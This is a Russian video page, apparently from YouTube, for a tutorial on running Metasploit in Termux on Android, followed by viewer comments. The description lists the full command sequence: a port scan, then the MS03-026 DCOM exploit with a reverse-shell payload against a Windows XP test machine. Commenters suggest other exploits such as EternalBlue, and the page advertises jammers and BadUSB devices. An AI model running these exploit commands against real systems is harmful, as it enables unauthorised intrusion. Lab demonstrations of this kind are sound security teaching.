Metasploit: Framework для проверки систем на защищенность | UnderMind
Ғылым және технология
✓ Наш паблик в Телеграме: t.me/under_public
✓ Чат в Телеграме: t.me/UnderChats
● В этом ролике: Я расскажу вам про Termux, Metasploit Framework и Android. Я решил попробовать установить Metasploit на Android без root прав, и проверить, будет ли этот Metasploit тем же самым? Или же его функционал будет сильно ограничен?
Так же мы проверим на защищенность мой тестовый компьютер на Windows XP.
-------------------------------------------------------------------------
● Команды из ролика:
pkg update
pkg install unstable-repo
pkg install metasploit
msfconsole
db_status
git init
use auxiliary/scanner/portscan/tcp
set PORTS 1-5000
set RHOSTS 192.168.88.161
run
search dcom
use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/shell_reverse_tcp
show options
set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)
set LHOST 192.168.88.247 - IP злоумышленника
run
cd ..\..\
echo Hello! (кнопка стрелки на Ю) achtung.x
----------------------------👇 Разверни 👇----------------------------
🔥 Наши Телеграм-каналы 🔥 - t.me/under_channels
✓ Наш второй канал: vk.cc/9Nuba7
✓ Паблик в ВК: vk.cc/aby9hC
✓ Чат в ВК: vk.cc/abxUPr
✓ Паблик в Телеграме: t.me/under_public
✓ Чат в Телеграме: t.me/UnderChats
-------------------------------------------------------------------------
● Помочь каналу и получить помощь в любых вопросах: donationalerts.com/r/undermind
● Стать спонсором канала: kzread.infojoin
● Я ВКонтакте: TheUnderMind
● Реклама на канале: bit.ly/2THIswk
----------------------------------------------------------------------
👉 Лучшие товары на Алике для ✖️aЦkера:
✓ Мой хаЦкepcкий смартфон для Kali Linux (Nethunter и поддержкой правильного ядра) - alii.pub/6co9up
✓ Лучший WiFi Адаптер - Аналог Alfa AWUS (работает в Kali Linux и Nethunter): alii.pub/6cobvt
✓ ХаЦкерские часы-деаутентификатор с WiFi: ali.pub/4hhw62
✓ НасkRF Оnе - лучший SDR: alii.pub/6co9v3
✓ Маленькая Bluetooth-клавиатура с подсветкой: ali.pub/4hhwwp
✓ USB порт для вашего смартфона (OTG Micro USB): alii.pub/6co9va
✓ WiFi Jаmmеr на ESP8266 (Глушилка-Деавторизатор WiFi): goo.gl/i7VHWP
✓ Злo Кaбель (BadUSB): ali.pub/4hhyo3
✓ Raspberry PI ZERO 2 W (можно сделать xaцk-станцию): alii.pub/6coati
✓ Ruby Ducky BadUSB (XaЦkepcкий девайс в виде флешки): alii.pub/6co9vo
✓ USB to Ethernet адаптер: ali.pub/4hhxux
✓ Разветвитель USB порта 1 в 4: alii.pub/6co9vv
✓ Дубликатор RFID ключей и карт: alii.pub/6co9w2
✓ Дубликатор RFID / NFC, редактор кодов: ali.pub/4hhy1q
✓ Недорогие, но очень мощные рации: goo.gl/dKibg5
✓ Недорогой, но мощный WiFi адаптер: ali.pub/5gr2ls
✓ Микро камера: alii.pub/6co9w9
✓ Клавиатуры с подсветкой для ПК: ali.pub/4hhyav
✓ Коврик для мыши с подсветкой: ali.pub/5gr2o4
✓ Набор для подсветки ПК: alii.pub/6cob3m
----------------------------------------------------------------------
● В ролике "Metasploit: Framework для проверки систем на защищенность | UnderMind" - я рассказываю вам о том, что такое Metasploit Framework. В этом ролике я рассказываю более подробней о Metasploit Project, и рассказываю о том, как установить Metasploit Framework на Android. Устанавливать его мы будем в Termux. А сам термукс - оказался наудивление интересным инструментом, ведь он даже не требует root прав! Но о нем как-нибудь в другой раз.
● Kali Linux - это обычная Операционная Система (ОС) для специалистов по защите информации. Эта ОС нигде не запрещена и есть в открытом доступе (не в даркнете). Все утилиты, которые в ней есть, предназначены для тестирования своих сетей и систем на защищенность. Автор ролика ни в коем случае не побуждает вас к созданию и использованию любого ПО в противозаконых целях! Данный ролик носит образовательный характер с точки зрения информационной безопасности, и призван повысить Вашу бдительность при обеспечении защиты информации.
● Данный ролик - художественный вымысел автора, монтаж, фотошоп и постанова. Всё рассказанное в ролике - является авторской выдумкой. Всё происходящее в видео - выполнено используя монтаж, и к реальной жизни не имеет никакого отношения. Любые совпадения наименований программного обеспечения (ПО), названий ПО и либо каких-либо других продемонстрированных фактов и событий в ролике - не более чем совпадение и полная случайность.
-------------------------------------------------------------------------
● Дополнительные хештеги: #kali #termux #metasploit #линукс #ubuntu #wifi #компьютер #pc #undermind #under #mind #андер #андермайнд
Пікірлер: 965
*Простой материал, да. Хотите больше метасплоита? Может Windows 7 проверим на защищенность? Или 10? А может быть "сверхзащищенный" iPhone? Как вам такое?* ● Команды из ролика: pkg update pkg install unstable-repo pkg install metasploit msfconsole db_status git init use auxiliary/scanner/portscan/tcp set PORTS 1-5000 set RHOSTS 192.168.88.161 - это IP той машины, которую будем проверять на защищенность run search dcom use exploit/windows/dcerpc/ms03_026_dcom set payload windows/shell_reverse_tcp show options set RHOSTS 192.168.88.161 set LHOST 192.168.88.247 - это у нас IP злоумышленника run #ГОТОВО! cd ..\..\ echo Hello! > achtung.x И вообще, теперь можно вводить любую команду, как в обычном cmd.exe
@lime9603
4 жыл бұрын
Го попробуем 10 Винду взломать тема кстати годная для новичка лайк
@MineSurv44
4 жыл бұрын
Давай Windows 10. Интересно проверить систему, которую постоянно пичкают обновлениями.
@noname-lg1eq
4 жыл бұрын
не работает (метосплоит не ставится)
@MokiHack
4 жыл бұрын
АЙФОН ДАВАЙ АЙФОН ПОЖАЛУЙСТА!!!!
@asbelous
4 жыл бұрын
Десяточкой интересно бы побаловаться
Не взлом, а тест на проникновение!
@lemon4ik_ytusv703
4 жыл бұрын
Если уметь им пользоваться можно очень много беды людям принести
@vanyazveruga1533
4 жыл бұрын
Bad Boy купить монитор)
@khachatryan7034
4 жыл бұрын
не Хакер а спейциалист по информацыонной безопасности
@tak1zawa207
4 жыл бұрын
@@user-ll6ot5fx1u учи Линукс все будет ок
@Toni-kd3gz
3 жыл бұрын
есть пробитие
Metasploit: Framework - огонь, было бы роскошно увидеть серию видосов))
@mrhakcer2895
4 жыл бұрын
Плюсую
@b1rd316
4 жыл бұрын
согласен
@2stupidboi
4 жыл бұрын
+
@gnot7900
2 жыл бұрын
Уже есть канал такой канал, на 40 видео о метасплоите)
@papochka3416
2 жыл бұрын
@@gnot7900 какой
Under, четкий видос, го лайк на коммент, больше темрукса значит больше лучшего контента! Press F to Respect
@gigger-nigga
4 жыл бұрын
F
@dyr4chy0
4 жыл бұрын
pay respect***
@absolutespectrum
3 жыл бұрын
FffffffffffffffffffffF
@user-qv5qj4dz9l
3 жыл бұрын
Press F to pay respect*) Termux*(Термукс*)
Ааа спасибо Андер, долго ждал видео о метасплоите
О видос про Termux. Респект)
Жду продолжения,интересная тема!
Интересненько!👍
Желательно больше роликов про termux, т.к. не каждая утилита с линукс в нём работает, и нужно искать замену, разбираться и д.т. А когда это показано, рассказано и прогкглино, и тебе удобно и автору просмотр и лайк)
@w1ndow
7 ай бұрын
Он сделал тг канал
Убойные у тебя ролики! Весь день смотрю! Все грамотно и понятно исполняешь! Ждем еще с этой темой!
Спасибо за контент!! Очень круто)
Вижу новый видос, бегу через весь город домой чтоб посмотреть!
респект за пример пентеста. классное объяснение. Жги еще. Единственное что надо, это объяснить откуда взялось "search dcom"
@time2517fg
4 жыл бұрын
Ну это прям слишком будет разжеванное видео, всё команды можно найти в интернете
@user-bs5hv7bw6u
4 жыл бұрын
Просто он заранее знал что будет искать дком, ибо это самый распространённый и самый лёгкий способ для XP.
@dd-de6gi
4 жыл бұрын
Ну сеарч деком эть поиск этого эксплоита как по мне
Го полный гайд с полным описанием каждой команды и лучшее их применение.
Спасибо за хороший контент. Буду ждать следующие видео
Красавчик, делаешь вещи . Интересно очень , и подача информации очень нравится смотрю на одном дыхании ! Спасибо тебе!
E: Unable to locate package metasploit
@ggb8833
3 жыл бұрын
такая же ситуация
@xoma9625
3 жыл бұрын
@@sfsshik1307 как?
@Painkiller413
2 ай бұрын
У меня тож также
@Isfand4ik
6 күн бұрын
@@Painkiller413 +
Как раз начал изучать метасплоит, но нормальных статей не нашел, только как установить... Спасибо огромное! Жду серию видео.
@DyaDyaFedor
4 жыл бұрын
Алёша Алёша кинь, если не трудно, а то одно говно в инете, мало годного
@DyaDyaFedor
4 жыл бұрын
.......
Спасибо! Очень интересная информация!
Жду не дождусь новых видео про термукс
Привет, давай больше роликов про термукс без рут прав, очень качественный контент делаешь. Заранее спасибо))
Over - ватсап не защищён UnderMind - пентагон не защищён
@user-mg3cz8kb9k
4 жыл бұрын
Как по мне они идут на равных, и у овера больше опыта
@user-ns8yy5hk5h
4 жыл бұрын
Овер ламер, не думаю что он пиздец какой опытный.....И спустя пол года, я понял что Андер просто за счёт подачи вывозит, нагло спижженной у Яна Топлеса. Он снимает видосы по статьям из телеграмма, опыта тут и не надо 💁♂️
@zzabolazza635
4 жыл бұрын
@@user-mg3cz8kb9k У Ундер Муинда есть образование в этой теме, а Овер сам все изучает
@user-mg3cz8kb9k
4 жыл бұрын
@@zzabolazza635 Человек без оброзования может быть умне человека с оброзованием, но Овер и Андер одинаково увны в теме Кальки, к стати овер снял рубрику Кальки с канала ...
@Oracule-bh5vy
4 жыл бұрын
Овер ламер ! АндерМинд опытный
Зачетище!!! Грамотно,толково...
Наконец-то видос с термукс, я очень долго ждал
Драсте снова. Если у вас после 2-го и последующих запусков при вводе db_status выводится No connection, то вот какие комманды надо использовать, чтобы устранить это: mkdir -p $PREFIX/var/lib/postgresql initdb $PREFIX/var/lib/postgresql pg_ctl -D $PREFIX/var/lib/postgresql start Заново запускаем Metasploit и все! Проблема решена!
@mort1s105
4 жыл бұрын
мужик не помогло
Я правильно услышал? -Аиркрэк в термукс в режиме монитора, да и даже без рут прав?????? Или это через малину?
@TheUnderMind
4 жыл бұрын
Я просто лайкну, а вы там сами додумывайте варианты))
@AnonYunus0x51
4 жыл бұрын
@@TheUnderMind окей)) чёт интересно стало)
@flux2594
4 жыл бұрын
Через малину, на обычном андроид смарте не получится, нужно подходящее ядро и рут соответственно. Много гемора. Проще купить малину, накатить на нее кали, подсоединить альфу и коннектиться по vnc
@storf277
4 жыл бұрын
У меня не получилось без рута юзать аиркрэк в режиме монитора в термуксе.
@versonind8197
4 жыл бұрын
Нет, без рут не получится, я пробовал
Очень интересно! Продолжай)
Жду продолжения)
3:36 Тут следовало бы упомянуть, что не у всех есть такая клава, и чтобы остановить команду, нужно нажать "Кнопка громкости + C" (на англ. раскладке | точно не помню, какая кнопка) (узнал на своём опыте :D)
@ph1myfet
4 жыл бұрын
H 336 прямо в термукс можно
@user-ij1yi2ri7h
3 жыл бұрын
Hackers keyboard? Тут есть и контрол и альт и прочее
under ,но ведь сейчас мало кто использует win xp ,и к тому на него легко найти exploit ,может покажешь нам как законнэктиться к вин 7 или выше?\)))
@chertstudio
4 жыл бұрын
Напиши в ютубе enternal Blue ms_17
Хочу продолжение, очень понравилось)))
Полезный видос, жду продолжения
Народ, чтобы хакнуть винду 10 через метасплоит, шанс равен ниже нуля, порты закрыты, взломать можно тока если система безопасности стоит старая (то есть не обновленная) так же антивирус блокнет ваш порт чек
@sos1skaee783
3 жыл бұрын
так же во время проверки портов, антивирус спалит ваш IP-адрес в этой сети
Отсылка к сериалу Мистер Робот(оставь меня сдесь)первый сезон, и серия вроде тоже первая)))))в прошлом видео была цикада))что же дальше?
@it-coding
4 жыл бұрын
Нахрен общество
@A1ekS.
3 жыл бұрын
Ооооооо даа корпорация зло
Спасибо, информативно)
Супер , ПРОДОЛЖАЙ !
Идея для видео: Свисток на термукс. Для wifite например. У меня не получилось
@Timur13240
4 жыл бұрын
Нужен рут и ядро, проще тогда поставить нет Хантер или андракс
@undefined1777
4 жыл бұрын
Термукс - хрень в плане атак на WiFi/Bluetooth.
@user-tr8rz9up1s
4 жыл бұрын
@@undefined1777 да, но удобство никто не отменял)
@romrom2497
4 жыл бұрын
не парься этой фигней, это все треш... аппарат себе сломаешь
Ого, даже не имея рут права можно натворить делов! Действительно в правильных (ровных,не кривых)руках много чего интересного можно делать.
Ролик шикарный, лайк однозначно, подписан давно, чел просто мощь💪💪🔥😎😎🔥
Ждем продолжение успехов в продвижение
все ок до момента exploit, у меня в конце пишет Exploit completed, but no session was created, и после возвращает назад...
@user-ld1gz1cr1j
4 жыл бұрын
тоже самое( Правда, я десятку хотел крякнуть)) Получилось у тебя??
@user-ce3ii7ug2o
4 жыл бұрын
Эксплоит завершён,но сессия не была создана.
@itsmakar2412
3 жыл бұрын
Ты сделал чтото не так
@MrMoringo2005
3 жыл бұрын
У меня так же, что делать??
@itsmakar2412
3 жыл бұрын
@@MrMoringo2005 у ос которую ты хотел хакнуть уже исправлен эксплоит
8:30 ( взлом жопы )
Спасибо, под прошлым роликом я писал комментарий и на него мне ответили видео)) не зря колокольчик стоит))) +
Го один день из твоей жизни ?)
Сделай видос про hack rf (и в целом sdr)
@hederinov
4 жыл бұрын
+
спасибо, братан! кайфанул от инфы
очень хороший видос у меня понравился Спасибо😍
У меня не определяет местонахождение metosploit и install unstaled-repo что делать?
@ges7705
3 жыл бұрын
+
@KENNYPROG
3 жыл бұрын
У меня тоже
У меня у одного пакеты не находились ?)
@nickolauskaskas
3 жыл бұрын
У меня не нашел ни unstable-repo, ни соот-нно metasploit
@user-xm6pz3qw8c
2 жыл бұрын
У меня была такая проблема но я его легко исправил но надо ждать 2-3 часа
@user-xm6pz3qw8c
2 жыл бұрын
@Lil Crippie эт легко
@user-xm6pz3qw8c
2 жыл бұрын
@Lil Crippie но придется ждать 2-3 часа зависит от инета ты готов ждать?
@user-xm6pz3qw8c
2 жыл бұрын
@Lil Crippie ну ок я щас те дам ссылку там делаеш все как делает он
Как обычно-все четко. Мне почти 50, но я учусь у молодых. Kali linux узнал год назад, очень интересно.
Круто делаешь, жду продолдения
Дед: - Бабка, а помнишь как у меня в сорок четвёртом ноги болели? - Помню, родненький, помню! - А я сорок пятый купил - и не болят!
Exploit copmleted, but no session was created.... ну как после такого жить
@nikolaykiseleov3367
4 жыл бұрын
Я до конца не понял ... Атакуемая машина должна быть включена? Один раз получилось установив 135 порт set RPORTS 135.. сессия была создана но команды не выполнялись...
@saidyuldashev5469
4 жыл бұрын
У меня тоже эта ошибка как ее решить?
@fsociety7825
4 жыл бұрын
@@saidyuldashev5469 чёрт, я не знаю....не как руки не доходят.....если узнаешь отпишись пж🙏
@youroman
4 жыл бұрын
Кто решил ?
@user-xm6ff7bz7w
4 жыл бұрын
тоже самое
Очень жду новых видосов на проверку новых систем и самого андроида.
Спасибо 👍👍👍👍😁
Что делать, если он не находит этот пакет?(
@darchidark
Жыл бұрын
Они выпилили весь вредоносный код от туда. У тебя ничего не получится!
С айфоном тема хайповая была бы, но ведь по судам затаскают (((
@mrhakcer2895
4 жыл бұрын
А ты сделай так что бы не таскали по судам)
@sierrochkabananchik
3 жыл бұрын
@@mrhakcer2895 Взломать суд👍🏿
Замечательно 👍🏻
Поздновато но всё же лайк)
А также можно использовать эксплойт eternalblue (ms17_010)
@Timur13240
4 жыл бұрын
И новую хрень блюекип
@MrFunny01
4 жыл бұрын
Это уязва на Винде виста и 7, 8-8.1, на хп этого порта ещё не было.
@Timur13240
4 жыл бұрын
@@MrFunny01 да, я знаю, это РДП
@samuelstudio1088
4 жыл бұрын
@@MrFunny01 я пытался воспроизвести MS17_010 на 8.1 не вышло
@MrFunny01
4 жыл бұрын
@@samuelstudio1088 так там улучшенная MS17_010_8 вроде, просто напиши search ethernalblue,и там найдешь для винды 8, у меня получалось
E: Unable to locate package metasploit что делать?
@dartay2893
3 жыл бұрын
Еще нужно?
@mrhaim771
3 жыл бұрын
@@dartay2893 всм?
Вот это реально годно !
Больше про метамплойт 🤸♂️🤸♂️🤸♂️🤸♂️🤸♂️
Уважаемый ,по возможности- сделай ролик по использовании оболочки (shell)...
@chertstudio
4 жыл бұрын
Shell = ssh xd
Андер, Exploit completed, but no session was created, в чем дело?
@alsychev7446
3 жыл бұрын
это значит система слишком защищенная
@somebody_exe1840
3 жыл бұрын
@@alsychev7446 нет, это вообще не из-за этого
@deadfamhvh
3 жыл бұрын
@@somebody_exe1840 а из за чего тогда, а?
@somebody_exe1840
3 жыл бұрын
@@deadfamhvh нужно прописать кое - что еще, тк metasploit переделали, и теперь он не создаёт саму сессию. Вот pg_ctl -D /data/data/com.termux/files/usr/var/lib/postgresql -l logfile start, пропиши это в новой сессии, потом запускай метасплоит в другой. Мне помогло
@deadfamhvh
3 жыл бұрын
@@somebody_exe1840 ок спасибо
Мощно
Respect)
- Кого это хоронят? - Да вон того мужика, который в гробу лежит…
Теперь 13 летных хакеров станет больше
@chpukich2285
2 жыл бұрын
Да)
Никогда не думал что мой телефон без специального софта может такое... Ждём второй части!
Лайкос на автомате
Sending exploit ... [*] Exploit completed, but no session was created. Хэлп, не пойму чё за дела
@user-sy5de6mo7g
4 жыл бұрын
У меня та же проблема. Ты не нашёл решение?
@user-mf1fw8wl4o
4 жыл бұрын
@@user-sy5de6mo7g pg_ctl -D /data/data/com.termux/files/usr/var/lib/postgresql -l logfile start веди это в новой сессии , и в другой включай metasploit
@user-mf1fw8wl4o
4 жыл бұрын
pg_ctl -D /data/data/com.termux/files/usr/var/lib/postgresql -l logfile start веди это в новой сессии , и в другой включай metasploit
@user-sy5de6mo7g
4 жыл бұрын
Спс
@user-xm6ff7bz7w
4 жыл бұрын
@@user-mf1fw8wl4o у тебя тоже такая ошибка была?
Привет андер моём пк доктор веб обнаружил виру троян Я её удалил но сомневаюс всё кончено с вирусом в В ТОП ПЛИЗ
@puffysampmobile3671
4 жыл бұрын
Ну сматри ьереш малаток и никааумхих вирумов в жизниинет!
Раньше я занималась компьторами, и сейчас когда есть время стараюсь разобраться сама с телефоном: внуки тврят.очень много роликов хорошихи нужеые. Вам респек. Молодцы
Побольше лайкосов тебе друг. Видос запилил годный! Спасибо разъяснил всё четко и по полкам! Го проверим инф.безопасность android
Ещё интересно услышать про сдр, попробуй тестовый ролик, а там как пойдёт. Удачи 🤞
Это круто!
Зачёт !!!
Красавчик !
Ждем
Продолжай эту тему)
Двигай дальше тему, очень интересно
красавчик
Больше видео на тему про Metasploit!
Шикарно
годнота !
Ты лучший!
Видос топ!
Like deserve, :) good content.
Молодец 👍🏻
Прикольно
Большая работа проделана, молодец
Интересное видео... Давай продолжение...
Афигеть #1
Хорош
Продолжай
Спасибо!
Блин, подскажи пожалуйста, когда ты сказал не забывать про таб, его надо нажать или как?
Афигеть #3
Возрождай рубрику) ждееем